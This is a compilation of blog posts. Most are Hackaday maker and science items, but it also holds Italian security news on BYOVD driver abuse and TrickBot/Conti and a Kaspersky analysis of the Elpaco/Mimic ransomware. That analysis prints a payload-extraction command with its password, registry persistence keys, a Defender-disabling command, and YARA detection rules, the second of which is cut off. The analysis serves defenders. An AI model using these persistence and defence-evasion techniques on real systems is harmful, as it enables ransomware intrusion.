Once the design was ready, the image was sliced into strips that matched the width of the receipt paper. Printing over 1,000 feet of paper wasn’t without its issues, so [Davis] designed a custom spool system to undo the curling of the receipts. Hanging the mural involved 3D-printed brackets and binder clips, allowing the strips to hang freely with a kinetic effect.

Though the thermal paper will fade over time, the beauty of this project lies in its adaptability—just reprint any faded strips. Want to see how it all came together? Watch the full process here.

youtube.com/embed/dx0aSfPZonM?…

hackaday.com/2024/11/26/massiv…

What’s life without a little mystery? There’s one less rolling around after historians finally identified a donated mystery machine that had been in storage for years.
Feeding dough through this machine may have been faster, but probably not safer.
The main pieces of the machine are about a century old and any staff who may have known more about the undocumented device were no longer around to ask. The historical society finally posted pictures and asked for any insights, which eventually led to solving the mystery.

The machine is in all likelihood a beaten biscuit maker, which was a type of dense baked good popular in the American south. Making them called for a long and labor-intensive process of pounding and working the dough, and the society says this machine was likely created by a fellow trying to help his aunt streamline her business, offloading the labor of working the dough to a machine.

The machine had no branding of any sort and lacked any identifying marks. Its purpose was doubtfully obvious at the time, but no records remained and quite possibly none existed in the first place. Sound familiar? Perhaps someday our own undocumented projects and prototypes will mystify people. It’s certainly happened in the case of mysterious Roman dodecahedrons, which remain a head-scratching mystery.

hackaday.com/2024/11/26/your-u…

Although humanity was hoping for a more optimistic robotic future in the post-war era, with media reflecting that sentiment like The Jetsons or Lost in Space, we seem to have shifted our collective consciousness (for good reasons) to a more Black Mirror/Terminator future as real-world companies like Boston Dynamics are actually building these styles of machines instead of helpful Rosies. But this future isn’t guaranteed, and a PhD researcher is hoping to claim back a more hopeful outlook with a robot called Blossom which is specifically built to investigate how humans interact with robots.

For a platform this robot is not too complex, consisting of an accessible frame that can be laser-cut from wood with only a few moving parts controlled by servos. The robot is not too large, either, and can be set on a desk to be used as a telepresence robot. But Blossom’s creator [Michael] wanted this to help understand how humans interact with robots so the latest version is outfitted not only with a large language model with text-to-speech capabilities, but also with a compelling backstory, lore, and a voice derived from Animal Crossing that’s neither human nor recognizable synthetic robot, all in an effort to make the device more approachable.

To that end, [Michael] set the robot up at a Maker Faire to see what sorts of interactions Blossom would have with passers by, and while most were interested in the web-based control system for the robot a few others came by and had conversations with it. It’s certainly an interesting project and reminds us a bit of this other piece of research from MIT that looked at how humans and robots can work productively alongside one another.

hackaday.com/2024/11/26/a-robo…

[bitluni]’s laser-based display pretending to be a an old-school vector CRT.Phosphor-based displays like CRTs rely on the phosphor to emit light for a set amount of time after being activated, allowing them to display a seemingly persistent image with one drawing beam per color. Translated to UV-sensitive PLA filament, this means that you can totally use a printed sheet of this material in combination with a 405 nm laser diode to create a display that doesn’t look dissimilar to an early CRT. This is exactly what [bitluni] did in a recent video, meshing together said laser diode, UV-sensitive PLA, stepper motors and two mirrors with an Arduino-based controller to create a rather interesting vector display.

In the video, [bitluni] goes over the development steps, including a range of improvements like being able to turn off the laser when moving between the end of a line and the beginning of a new one. While the Arduino Nano board does the driving of the stepper motor controllers, an ESP32 provides the drawing instructions. The STL and other project files including Nano & ESP32 firmware can be found on the GitHub project page.

While far from being a practical display with a single-digit Hz refresh rate, it does provide an interesting demonstration of these types of persistence of vision based displays, and without the use of exotic MEMS mirror modules or the like.

youtube.com/embed/9qPc_I1V6go?…

hackaday.com/2024/11/26/a-lase…

By default, bash is the most popular command language simply because it’s included in most *nix operating systems. Additionally, people don’t tend to spend a lot of time thinking about whatever their computer uses for scripting as they might for other pieces of software like a word processor or browser. If you are so inclined to take a closer look at this tool that’s often taken for granted, there are a number of alternatives to bash and [monzool] wanted to investigate them closely.

Unlike other similar documentation that [monzool] has come across where the writers didn’t actually use the scripting languages being investigated, [monzool] is planning to use each of these and accomplish specific objectives. This will allow them to get a feel for the languages and whether or not they are acceptable alternatives for bash. Moving through directories, passing commands back and forth, manipulating strings, searching for files, and manipulating the terminal display settings are all included in this task list. A few languages are tossed out before initial testing even begins for not meeting certain specific requirements. One example is not being particularly useful in [monzool]’s preferred embedded environments, but even so there are enough bash alternatives to test out ten separate languages.

Unfortunately, at the end of the day none of the ten selected would make a true replacement for bash, at least for [monzool]’s use case, but there were a few standouts nonetheless. Nutshell was interesting for being a more modern, advanced system and [monzool] found Janet to be a fun and interesting project but had limitations with cross-compiling. All in all though this seemed to be an enjoyable experience that we’d recommend if you actually want to get into the weeds on what scripting languages are actually capable of. Another interesting one we featured a while back attempts to perform as a shell and a programming language simultaneously.

hackaday.com/2024/11/26/altern…

Life was simpler when everything your computer did was text-based. It is easy enough to shove data into one end of a pipe and take it out of the other. Sure, if the pipe extends across the network, you might have to call it a socket and take some special care. But how do you pipe all the data we care about these days? In particular, I found I wanted to transport audio from the output of one program to the input of another. Like most things in Linux, there are many ways you can get this done and — like most things in Linux — only some of those ways will work depending on your setup.

Why?

There are many reasons you might want to take an audio output and process it through a program that expects audio input. In my case, it was ham radio software. I’ve been working on making it possible to operate my station remotely. If all you want to do is talk, it is easy to find software that will connect you over the network.

However, if you want to do digital modes like PSK31, RTTY, or FT8, you may have a problem. The software to handle those modes all expect audio from a soundcard. They also want to send audio to a soundcard. But, in this case, the data is coming from a program.

Of course, one answer is to remote desktop into the computer directly connected to the radio. However, most remote desktop solutions aren’t made for high-fidelity and low-latency audio. Plus, it is nice to have apps running directly on your computer.

I’ll talk about how I’ve remoted my station in a future post, but for right now, just assume we want to get a program’s audio output into another program’s audio input.

Sound System Overview

Someone once said, “The nice thing about standards is there are so many of them.” This is true for Linux sound, too. The most common way to access a soundcard is via ALSA, also known as Advanced Linux Sound Architecture. There are other methods, but this is somewhat the lowest common denominator on most modern systems.

However, most modern systems add one or more layers so you can do things like easily redirect sound from a speaker to a headphone, for example. Or ship audio over the network.

The most common layer over ALSA is PulseAudio, and for many years, it was the most common standard. These days, you see many distros moving to PipeWire.

PipeWire is newer and has a lot of features but perhaps the best one is that it is easy to set it up to look like PulseAudio. So software that understands PipeWire can use it. Programs that don’t understand it can pretend it is PulseAudio.

There are other systems, too, and they all interoperate in some way. While OSS is not as common as it once was, JACK is still found in certain applications. Many choices!

One Way

There are many ways you can accomplish what I was after. Since I am running PipeWire, I elected to use qpwgraph, which is a GUI that shows you all the sound devices on the system and lets you drag lines between them.

It is super powerful but also super cranky. As things change, it tends to want to redraw the “graph,” and it often does it in a strange and ugly way. If you name a block to help you remember what it is and then disconnect it, the name usually goes back to the default. But these are small problems, and you can work around them.

In theory, you should be able to just grab the output and “wire” it to the other program’s input. In fact, that works, but there is one small problem. Both PipeWire and PulseAudio will show when a program is making sound, and then, when it stops, the source vanishes.

This makes it very hard to set up what I wanted. I wound up using a loopback device so there was something for the receiver to connect to and the transient sending device.

Here’s the graph I wound up with:
A partial display of the PipeWire configuration
I omitted some of the devices and streams that didn’t matter, so it looks pretty simple. The box near the bottom right represents my main speakers. Note that the radio speaker device (far left) has outputs to the speaker and to the JTDX in box.

This lets me hear the audio from the radio and allows JTDX to decode the FT8 traffic. Sending is a little more complicated.

The radio-in boxes are the loopback device. You can see it hooked to the JTDX out box because when I took the screenshot, I was transmitting. If I were not transmitting, the out box would vanish, and only the pipe would be there.

Everything that goes to the pipe’s input also shows up as the pipe’s output and that’s connected directly to the radio input. I left that box marked with the default name instead of renaming it so you can see why it is worth renaming these boxes! If you hover over the box, you’ll see the full name which does have the application name in it.

That means JTDX has to be set to listen and send to the streams in question. The radio also has to be set to the correct input and output. Usually, setting them to Pulse will work, although you might have better luck with the actual pipe or sink/source name.

In order to make this work, though, I had to create the loopback device:
pw-loopback -n radio-in -m '[FL FR]' --capture-props='[media.class=Audio/Sink]' --playback-props='[media.class=Audio/Source]' &
This creates the device as a sink with stereo channels that connect to nothing by default. Sometimes, I only connect the left channels since that’s all I need, but you may need something different.

Other Ways

There are many ways to accomplish this, including using the pw-link utility or setting up special configurations. The PipeWire documentation has a page that covers at least most of the scenarios.

You can also create this kind of virtual device and wiring with PulseAudio. If you need to do that, investigate the pactl command and use it to load the module-loopback module.

It is even possible to use the snd-aloop module to create loopback devices. However, PipeWire seems to be the future, so unless you are on an older system, it is probably better to stick to that method.

Sound Off!

What’s your favorite way to route audio? Why do you do it? What will you do with it? I’ll have a post detailing how this works to allow remote access to a ham transceiver, although this is just a part of the equation. It would be easy enough to use something like this and socat to stream audio around the network in fun ways.

We’ve talked about PipeWire for audio and video before. Of course, connecting blocks for audio processing makes us want to do more GNU Radio.

hackaday.com/2024/11/26/linux-…

Gli specialisti di Trellix hanno rilevato una nuova campagna dannosa che sfrutta il vecchio e vulnerabile driver anti-rootkit di Avast (Avast Anti-Rootkit). Gli aggressori utilizzano le tattiche BYOVD (Bring Your Own Vulnerable Driver) per eludere il rilevamento e disabilitare i componenti di sicurezza.

Il malware, che installa il driver vulnerabile sui sistemi delle vittime, è una variante del malware AV Killer. Viene fornito con un elenco codificato contenente i nomi di 142 processi di sicurezza associati a soluzioni di vari produttori.

Poiché il vecchio driver Avast può essere eseguito a livello di kernel, fornisce agli aggressori l’accesso a parti critiche del sistema operativo e consente inoltre al malware di interrompere i processi.

Secondo gli esperti di Trellix, parte del malware (vale a dire il file kill-floor.exe) colloca il driver vulnerabile ntfs.bin nella cartella utente predefinita di Windows. Il malware crea quindi il servizio aswArPot.sys utilizzando Service Control (sc.exe) e registra il driver.

Il malware controlla quindi un elenco di 142 processi associati a vari strumenti di sicurezza e cerca corrispondenze in diverse istantanee dei processi attivi sul sistema. Se viene trovata una corrispondenza, il malware crea un handle per collegarsi al driver Avast installato e utilizza l’API DeviceIoControl per emettere i comandi IOCTL necessari e interrompere il processo.

Il malware attacca i processi di molte soluzioni di sicurezza, inclusi i prodotti di McAfee, Symantec (Broadcom), Sophos, Avast, Trend Micro, Microsoft Defender, SentinelOne, ESET e BlackBerry. Disabilitandoli, il malware è in grado di eseguire liberamente azioni dannose senza generare avvisi o temere il blocco.

Vale la pena notare che questo particolare driver Avast è stato precedentemente sfruttato dagli aggressori. Ad esempio, all’inizio del 2022, i ricercatori sulla sicurezza informatica hanno riportato che AvosLocker utilizzava tattiche simili. E nel 2021, il driver anti-rootkit Avast ha sfruttato il ransomware Cuba.

Più o meno nello stesso periodo, gli esperti di SentinelLabs hanno scoperto due vulnerabilità (CVE-2022-26522 e CVE-2022-26523) che esistevano dal 2016. Questi bug hanno permesso agli aggressori di aumentare i propri privilegi sul sistema di destinazione e di sfuggire alla sandbox. Di conseguenza, gli sviluppatori Avast sono stati informati di questi problemi e la società ha risolto i bug nel dicembre 2021.

L'articolo Il BYOVD sempre più utilizzato per disabilitare gli AV/EDR. Avast, McAfee, Sophos nel mirino proviene da il blog della sicurezza informatica.

Imagine you own a weather station. Then imagine that after some years have passed, you’ve had to replace one of the sensors multiple times. Your new problem is that the sensor is no longer available. What does a hacker like [Luca] do? Build a custom solution, of course!

[Luca]’s work concerns the La Crosse WS-9257F-IT weather station, and the repeat failures of the TX44DTH-IT external sensor. Thankfully, [Luca] found that the weather station’s communication protocol had been thoroughly reverse-engineered by [Fred], among others. He then set about creating a bridge to take humidity and temperature data from Zigbee sensors hooked up to his Home Assistant hub, and send it to the La Crosse weather station. This was achieved with the aid of a SX1276 LoRa module on a TTGO LoRa board. Details are on GitHub for the curious.

Luca didn’t just work on the Home Assistant integration, though. A standalone sensor was also developed, based on the Xiao SAMD21 microcontroller board and a BME280 temperature, pressure, and humidity sensor. It too can integrate with the Lacrosse weather station, and proved useful for one of [Luca’s] friends who was in the same boat.

Ultimately, it sucks when a manufacturer no longer supports hardware that you love and use every day. However, the hacking community has a way of working around such trifling limitations. It’s something to be proud of—as the corporate world leaves hardware behind, the hackers pick up the slack!

hackaday.com/2024/11/26/recrea…

Dal traffico di droga agli omicidi su commissione, il dark web è il regno oscuro del possibile. Perché le indagini sono così difficili.

The post Dark web, la grande piazza dei traffici illegali appeared first on InsideOver.

Most of us associate echolocation with bats. These amazing creatures are able to chirp at frequencies beyond the limit of our hearing, and they use the reflected sound to map the world around them. It’s the perfect technology for navigating pitch-dark cave systems, so it’s understandable why evolution drove down this innovative path.

Humans, on the other hand, have far more limited hearing, and we’re not great chirpers, either. And yet, it turns out we can learn this remarkable skill, too. In fact, research suggests it’s far more achievable than you might think—for the sighted and vision impaired alike!

Bounce That Sound

Bats are the most famous biologcal users of echolocation. Credit: Petteri Aimonen
Before we talk about humans using echolocation, let’s examine how the pros do it. Bats are nature’s acoustic engineers, emitting rapid-fire ultrasonic pulses from their larynx that can range from 11 kHz to over 200 kHz. Much of that range is far beyond human hearing, which tops out at under 20 kHz. As these sound waves bounce off objects in their environment, the bat’s specialized ultrasonic-capable ears capture the returning echoes. Their brain then processes these echoes in real-time, comparing the outgoing and incoming signals to construct a detailed 3D map of their surroundings. The differences in echo timing tell them how far away objects are, while variations in frequency and amplitude reveal information about size, texture, and even movement. Bats will vary between constant-frequency chirps and frequency-modulated tones depending on where they’re flying and what they’re trying to achieve, such as navigating a dark cavern or chasing prey. This biological sonar is so precise that bats can use it to track tiny insects while flying at speed.

Humans can’t naturally produce sounds in the ultrasonic frequency range. Nor could we hear them if we did. That doesn’t mean we can’t echolocate, though—it just means we don’t have quite the same level of equipment as the average bat. Instead, humans can achieve relatively basic echolocation using simple tongue clicks. In fact, a research paper from 2021 outlined that skills in this area can be developed with as little as a 10-week training program. Over this period, researchers successfully taught echolocation to both sighted and blind participants using a combination of practical exercises and virtual training. A group of 14 sighted and 12 blind participants took part, with the former using blindfolds to negate their vision.

The aim of the research was to investigate click-based echolocation in humans. When a person makes a sharp click with their tongue, they’re essentially launching a sonic probe into their environment. As these sound waves radiate outward, they reflect off surfaces and return to the ears with subtle changes. A flat wall creates a different echo signature than a rounded pole, while soft materials absorb more sound than hard surfaces. The timing between click and echo precisely encodes distance, while differences between the echoes reaching each ear allows for direction finding.
The orientation task involved asking participants to use mouth clicks to determine the way a rectangular object was oriented in front of them. Credit: research paperThe size discrimination task asked participants to determine which disc was bigger solely using echolocation. Credit: research paper
The training regime consisted of a variety of simple tasks. The researchers aimed to train participants on size discrimination, with participants facing two foam board disks mounted on metal poles. They had to effectively determine which foam disc was larger using only their mouth clicks and their hearing. The program also included an orientation challenge, which used a single rectangular board that could be rotated to different angles. The participants had to again use clicks and their hearing to determine the orientation of the board. These basic tools allowed participants to develop increasingly refined echo-sensing abilities in a controlled environment.

Perhaps the most intriguing part of the training involved a navigation task in a virtually simulated maze. Researchers first created special binaural recordings of a mannikin moving through a real-world maze, making clicks as it went. They then created virtual mazes that participants could navigate using keyboard controls. As they navigated through the virtual maze, without vision, the participants would hear the relevant echo signature recorded in the real maze. The idea was to allow participants to build mental maps of virtual spaces using only acoustic information. This provided a safe, controlled environment for developing advanced navigation skills before applying them in the real world. Participants also attempted using echolocation to navigate in the real world, navigating freely with experimenters on hand to guide them if needed.
Participants were trained to navigate a virtual maze using audio cues only. Credit: research paper
The most surprising finding wasn’t that people could learn echolocation – it was how accessible the skill proved to be. Previous assumptions about age and visual status being major factors in learning echolocation turned out to be largely unfounded. While younger participants showed some advantages in the computer-based exercises, the core skill of practical echolocation was accessible to all participants. After 10 weeks of training, participants were able to correctly answer the size discrimination task over 75% of the time, and at increased range compared to when they began. Orientation discrimination also improved greatly over the test period to a success rate over 60% for the cohort. Virtual maze completion times also dropped by over 50%.
Over time, participants improved in all tasks—particularly the size discrimination task, as seen in the results on this graph. The difficulty level of tasks were also scaled over time, presenting greater challenge as participants improved their echolocation skills. Credit: research paper
The study also involved a follow-up three months later with the blind members of the cohort. Participants credited the training with improving their spatial awareness, and some noted they had begun to use the technique to find doors or exits, or to make their way through strange places.

What’s particularly fascinating is how this challenges our understanding of basic human sensory capabilities. Echolocation doesn’t involve adding new sensors or augmenting existing ones—it’s just about training the brain to extract more information from signals it already receives. It’s a reminder that human perception is far more plastic than we often assume.

The researchers suggest that echolocation training should be integrated into standard mobility training for visually impaired individuals. Given the relatively short training period needed to develop functional echo-sensing abilities, it’s hard to argue against its inclusion. We might be standing at the threshold of a broader acceptance of human echolocation, not as an exotic capability, but as a practical skill that anyone can learn.

hackaday.com/2024/11/26/humans…

[ClownVamp]’s art project The Junk Machine is an interactive and eye-catching machine that, on demand, prints out an equally eye-catching and unique yet completely meaningless (one may even say corrupted) AI-generated advertisement for nothing in particular.

The machine is an artistic statement on how powerful software tools that have genuine promise and usefulness to creative types are finding their way into marketer’s hands, and resulting in a deluge of, well, junk. This machine simplifies and magnifies that in a physical way.

We can’t help but think that The Junk Machine is in a way highlighting Sturgeon’s Law (paraphrased as ‘ninety percent of everything is crud’) which happens to be particularly applicable to the current AI landscape. In short, the ease of use of these tools means that crud is also being effortlessly generated at an unprecedented scale, swamping any positive elements.

As for the hardware and software, we’re very interested in what’s inside. Unfortunately there’s no deep technical details, but the broad strokes are that The Junk Machine uses an embedded NVIDIA Jetson loaded up with Stable Diffusion’s SDXL Turbo, an open source AI image generator that can be installed and run locally. When and if a user mashes a large red button, the machine generates a piece of AI junk mail in real time without any need for a network connection of any kind, and prints it from an embedded printer.

Watch it in action in the video embedded below, just under the page break. There are a few more different photos on [ClownVamp]’s X account.

cdn.transientlabs.xyz/tlx/junk…

hackaday.com/2024/11/26/the-ju…

Introduction

In a recent incident response case, we dealt with a variant of the Mimic ransomware with some interesting customization features. The attackers were able to connect via RDP to the victim’s server after a successful brute force attack and then launch the ransomware. After that, the adversary was able to elevate their privileges by exploiting the CVE-2020-1472 vulnerability (Zerologon).

The identified variant abuses the Everything library and provides an easy-to-use GUI for the attacker to customize the operations performed by the malware. It also has features for disabling security mechanisms and running system commands.

This ransomware variant is named “Elpaco” and contains files with extensions under the same name. In this post, we provide details about Elpaco, besides already shared, as well the tactics, techniques and procedures (TTPs) employed by the attackers.

Analysis

First look at the sample

Our analysis started with a basic inspection of the sample. First, we verified its properties, such as the file type, strings and capabilities, as shown in the images below.

File type analysis

Interestingly enough, the malware used a 7-Zip installer mechanism, so it was classified as packed by most malware analysis tools and raised suspicions with detection tools.

File properties analysis

Entropy analysis

We inspected the file as a ZIP and found that the sample abused the Everything library, a legitimate filename search engine that provides fast searching and real-time updates by indexing files in Windows systems.

Malware archive contents

The artifact abused this library in similar ways to the Mimic ransomware discovered earlier by TrendMicro: it contained legitimate Everything applications (
Everything32.dll and Everything.exe) and a password-protected archive with malicious payloads, named Everything64.dll. The remaining file inside the archive was a legitimate 7-Zip utility for extracting the malicious archive contents. The Mimic ransomware searches for specific files using Everything APIs, encrypts user data, demands ransom payments, and exhibits sophisticated features like multi-threaded encryption to speed up the attack. Mimic also avoids detection by obfuscating its code, which makes it harder for security tools to detect and block the attack.
By analyzing Elpaco strings, we were able to identify the command used to extract the
Everything64.dll file, including its password.2e434 RunProgram="hidcon:7za.exe x -y -p7183204373585782 Everything64.dll"

7-Zip extraction command

When executed, the malware unpacked the archive and dropped the necessary files into the
%AppData%\Local directory, inside a separate directory with a randomly generated UUID as the name.C:\Users\user\AppData\Local\BD3FDDDF-6CAF-3EBC-D9CF-C8DF72D8F78A\
Destination directory

Sample contents

The archive contents are required for encrypting files and performing additional tasks in the operating system.

Elpaco structure

For example, the
DC.exe binary is the Defender Control tool for enabling and disabling Windows Defender. It is triggered by the sample once unpacked.

Defender Control (DC.exe) software

The sample also drops a file called
session.tmp into the same destination directory. This is a session key for resuming encryption if the malicious process is interrupted, as by a process kill.

session.tmp file

However, the most interesting artifact is
svhostss.exe, which is the main console used by the malware. It is worth mentioning that this name closely mimics svchost.exe, a legitimate Windows process. This naming pattern is often used by threat actors to confuse less experienced individuals during memory analysis. The svhostss.exe file is indeed the binary that performs malicious instructions. The malware comes with a GUI under the name gui40.exe, located in the same directory. It interacts with the console and facilitates operations like customizing ransomware properties, such as a ransom note or allowed directories/files, and performing actions in the target system.

DC.exe is called during runtime by svhostss.exe, with the /D available command for disabling

In the GUI, the operator can select entire drives for encryption, perform a process injection to hide malicious processes, customize the ransom note, change the encryption extension, set the order of encryption based on the original file format, and exclude specific directories, files or formats from encryption.

Ransomware GUI

Ransom note customization

It is also possible to kill certain processes specified by the operator and execute system commands, all of which makes this threat highly customizable.

Ransomware parameters

Data import and export

The sample allows for the import and export of malware configuration files according to the parameters set by the operator. There are several built-in templates within the malware for the operator to choose from. The image below shows an exported configuration file; note that each configuration is preceded by a number that represents its ID.

Custom configuration file

The console interface, running alongside the GUI, gathers detailed information about the system, including drives and file shares.

Information gathering by svhostss.exe

The malware creates the following registry keys — note that all files with the default
.ELPACO-team extension are classified as “mimicfiles” and configured to open the ransom note (Decryption_INFO.txt).HKLM\SOFTWARE\Classes\.ELPACO-team\: "mimicfile"

HKLM\SOFTWARE\Classes\mimicfile\shell\open\command\: "notepad.exe
"C:\Users\user\AppData\Local\Decryption_INFO.txt""
Also, the artifact configures the
Run registry key to execute svhostss.exe and display the ransom note at startup.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhostss:
""C:\Users\user\AppData\Local\BD3FDDDF-6CAF-3EBC-D9CF-
C8DF72D8F78A\svhostss.exe""

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhostss.exe: "notepad.exe
"C:\Users\user\AppData\Local\Decryption_INFO.txt""
It is noteworthy that the main binary,
svhostss.exe, lacks significant protection from analysis, so we were able to easily see certain command executions performed by the malware.

Runtime strings

We were also able to find suspicious imports of the functions
FindFirstFileW, WriteFile, FindNextFileW and ShellExecuteW. These are typically used in ransomware samples for file manipulation, while the latter is often used for calling an external program, such as PowerShell, cmd.exe or a third-party component, for deleting the malware.

Function imports

In the case of the Elpaco and Mimic variants, it uses the
SetSearchW function exported from the legitimate Everything DLL to search the victim’s files, as shown in the images below. Interestingly enough, we detected no functions for data exfiltration.

SetSearchW function

Detection and analysis evasion

The artifact encrypts the victim’s files with the stream cipher ChaCha20. The key for this cipher is encrypted by the asymmetric encryption algorithm RSA-4096 — without the key we were unable to decrypt the files.

ChaCha20 call

As shown in the image below, all procedures performed by the ransomware during execution are logged to
C:\temp\MIMIC_LOG.txt. The artifact also drops a copy of the session.tmp key file into the same C:\temp directory.

MIMIC_LOG.txt file

The last step in malware execution is calling the
Del command to delete all executables, configuration files, DLLs, batch files and database-related files in the ransomware directory. Interestingly enough, before deleting, the sample uses the fsutil LOLBin, as shown in the image above, to securely erase svhostss.exe file, without the possibility of its recovery.

YARA rules

Based on our analysis of the sample, we developed the following YARA rules for detecting both the dropper and the console interface used by the GUI. The rules take into account the file type, relevant strings and library imports.

Elpaco dropper:
import "pe"

rule elpaco_dropper
{
meta:
author = "Kaspersky - GERT"
description = "Yara rule for detecting the Elpaco dropper."
target_entity = "file"

strings:
$s1 = "-p7183204373585782" wide ascii nocase
$s2 = "Everything64.dll" wide ascii nocase
$s3 = "ELPACO-team.exe" wide ascii nocase
condition:
(2 of ($s*)) and pe.imports("SHELL32.dll", "ShellExecuteW") and pe.imports("KERNEL32.dll",
"LoadLibraryA")
}
svhostss.exe (console interface):
import "pe"

rule elpaco_console
{
meta:
author = "Kaspersky - GERT"
description = "Yara rule for detecting the Elpaco/Mimic main console."
target_entity = "file"

strings:
$s1 = "powershell.exe -ExecutionPolicy Bypass" wide ascii nocase
$s2 = "Software\\Classes\\mimicfile\\shell\\open\\command" wide ascii nocase
$s3 = "cmd.exe /c DC.exe /D" wide ascii nocase
$s4 = "MIMIC_LOG.txt" wide ascii nocase
$s5 = "mimicfile" wide ascii nocase
$s6 = "Everything Setup..." wide ascii nocase
$s7 = "

Victims

We used these YARA rules on public sources to detect threat actors who had recently used the Elpaco sample and other Mimic variants, mainly in the United States, Russia, the Netherlands, Germany and France. However, their presence was not limited to those countries, with further cases detected in Canada, Romania, South Korea, the United Kingdom and so on.

Top 5 countries targeted by Mimic (download)

The following chart shows the evolution of Mimic appearances per month.

Mimic appearances per month, 2024 (download)

The collected data shows that Mimic variants, including Elpaco, have been used by attackers at least since August 2023.

Conclusion

In this incident, we observed that the Elpaco ransomware is a Mimic variant that abused the Everything DLL, which is used for file discovery. The artifact presented an interesting user interface for customizing its attributes, while allowing the operator to export the parameters to a configuration file. Unfortunately, the encryption algorithm makes it impossible to decrypt the files on an infected machine without the private key, which makes this threat hard to deal with. Another feature of Elpaco is that it deletes itself after encrypting files to evade detection and analysis. We have observed attacks with Elpaco and other Mimic samples on a massive scale, targeting a wide range of countries worldwide, and we’ll continue monitoring this threat.

Kaspersky products detect the threat described in this article with the following verdicts:

• HEUR:Trojan-Ransom.Win32.Generic (dropper).
• HEUR:Trojan-Ransom.Win32.Mimic.gen (svhostss.exe).

Tactics, techniques and procedures

Below are the TTPs identified from our malware analysis.

Indicators of Compromise

• 61f73e692e9549ad8bc9b965e25d2da683d56dc1 (dropper)
• 8af05099986d0b105d8e38f305efe9098a9fbda6 (svhostss.exe)

securelist.com/elpaco-ransomwa…

For a lot of electrical and mechanical machines, there are nominal and peak ratings for energy output or input. If you’re in marketing or advertising, you’ll typically look at the peak rating and move on with your day. But engineers need to know that most things can only operate long term at a fraction of this peak rating, whether it’s a power supply in a computer, a controller on an ebike, or the converter on a wind turbine. But this electric motor system has a unique cooling setup allowing it to function at nearly full peak rating for an unlimited amount of time.

The motor, called the Super Continuous Torque motor built by German automotive manufacturer Mahle is capable of 92% of its peak output power thanks to a unique oil cooling system which is able to remove heat and a rapid rate. Heat is the major limiter for machines like this; typically when operating at a peak rating a motor would need to reduce power output to cool down so that major components don’t start melting or otherwise failing. Given that the largest of these motors have output power ratings of around 700 horsepower, that’s quite an impressive benchmark.

The motor is meant for use in passenger vehicles but also tractor-trailer style trucks, where a motor able to operate at its peak rating would mean a smaller size motor or less weight or both, making them easier to fit into the space available as well as being more economically viable. Mahle is reporting that these motors are ready for production so we should be seeing them help ease the transportation industry into electrification. If you’re more concerned about range than output power, though, there’s a solution there as well so you don’t have to be stuck behind the times with fossil fuels forever.

Thanks to [john] for the tip!

hackaday.com/2024/11/26/electr…

Questa è la continuazione della storia di Conti. Potete leggere la parte precedente, che riguardava le origini del gruppo, nell’articolo apposito. In questa sede esploreremo le componenti interne del gruppo e come il loro ecosistema abbia iniziato lentamente a collassare. Wizard Spider è ancora pieno di sorprese e in questo episodio sveleremo quelle più proibite.

The Fool – Trick or Treat

Metà del 2021, Conti domina le prime pagine dei giornali con attacchi costanti e guadagni dai riscatti dalle vittime. L’operazione RaaS ha fatto parlare di sé nell’ecosistema, attirando l’attenzione di tutti i soggetti coinvolti, comprese le vittime, gli affiliati e le forze dell’ordine. Ma questo è solo un pezzo dell’intero puzzle.

Le operazioni Trickbot non si sono mai fermate e anzi continuavano ad evolversi. Come scritto nell’articolo precedente, Trickbot è diventato uno strumento popolare anche al di fuori delle operazioni Conti grazie al passaggio ad un modello Malware-as-a-Service (MaaS). Con un canone mensile, chiunque poteva utilizzare il famigerato Trojan modulare, che è stato costantemente sotto sviluppo (in questo articolo di CyberInt potete trovare alcuni dei moduli e dei metodi di distribuzione).

Il governo federale degli Stati Uniti aveva bisogno di contrastare gli attacchi ransomware e digitali, che hanno ricevuto un’enorme spinta grazie a questo nuovo ambiente sotterraneo esploso dopo il Ransom Cartel. Un piccolo passo indietro al 2020, le elezioni americane sono state previste per il 20 novembre. Quando abbiamo descritto il toolset di Wizard Spider/Conti nell’articolo precedente, abbiamo trattato anche le capacità di Ryuk Stealer. Alcune delle caratteristiche includevano l’esfiltrazione automatica di file che contenevano parole chiave specifiche (nel nome e nei contenuti) altamente correlate ad asset dei vari governi occidentali.

Tutto ciò ha evidenziato come il gruppo dietro Ryuk, TrickBot e Conti avesse particolari interessi politici al di là dei meri scopi economici. Ovviamente l’origine degli attacchi è stata attribuita ai russi. Gli Stati Uniti erano preoccupati per la potenziale influenza o il sabotaggio delle imminenti elezioni, il che ha motivato le forze dell’ordine a lanciare operazioni offensive contro l’infrastruttura botnet TrickBot.

Il Cyber Command statunitense (mai confermato dall’agenzia stessa), guidato dal direttore dell’NSA Paul M. Nakasone, ha effettuato un’operazione di disturbo dell’intera infrastruttura della botnet TrickBot nel 2020. A settembre la botnet è stata invasa da file di configurazione intenzionalmente falsati per impostare la comunicazione con il server C2 sull’indirizzo IP localhost.

Snippet of the configuration files (KrebOnSecurity)

La nuova configurazione ha interrotto le comunicazioni del Trojan, bloccando di fatto parte delle sue operazioni, in particolare gli attacchi Ransomware. Inoltre, Microsoft ha intrapreso una serie di azioni legali per bloccare completamente le macchine di TrickBot. In meno di due settimane l’azienda è riuscita a spegnere 120 dei 128 server (fonte Microsoft).

Un duro colpo per TrickBot, ma non per molto tempo… in realtà più breve del previsto. In qualche modo gli sviluppatori “evil” hanno incorporato un meccanismo di recupero con l’obiettivo di recuperare i canali di comunicazione interrotti con gli agents di TrickBot nel caso in cui l’infrastruttura venisse modificata. La resilienza sembrava essere la priorità più importante per il gruppo TrickBot. L’operazione non è un buco nell’acqua solo perché la rapidità di recupero e l’adattabilità della minaccia sul piano tecnico sia stata repentina, ma è stata un messaggio per tutti che mostra la posizione del governo statunitense contro gli attacchi digitali e gli ambienti criminali con un approccio proattivo.

La direzzione di Paul M. Nakasone, sotto l’amministrazione, Trump è stata chiara: “impegno persistente”, “difesa in avanti” e “caccia in avanti” piuttosto che prevenzione e mitigazione passiva. Non ci sono prove che TrickBot sia stato utilizzato specificamente su obiettivi con finalità di sabotaggio elettorale, ma gli attacchi ransomware tramite il trojan sono continuati con lo stesso ritmo anche dopo l’elezione di Biden.

Paul M. Nakasone

Un mandato di arresto per gli sviluppatori e i manutentori di TrickBot è stato emesso nell’Agosto 2020. Abbiamo dovuto aspettare fino all’inizio del 2021 per avere alcuni di questi individui ammanettati, a Febbraio “Max” è il primo membro di TrickBot che ha dovuto affrontare la dea bendata.

Ladies and gentelmen, Alla Witte, 55 anni, in arte “Max”.

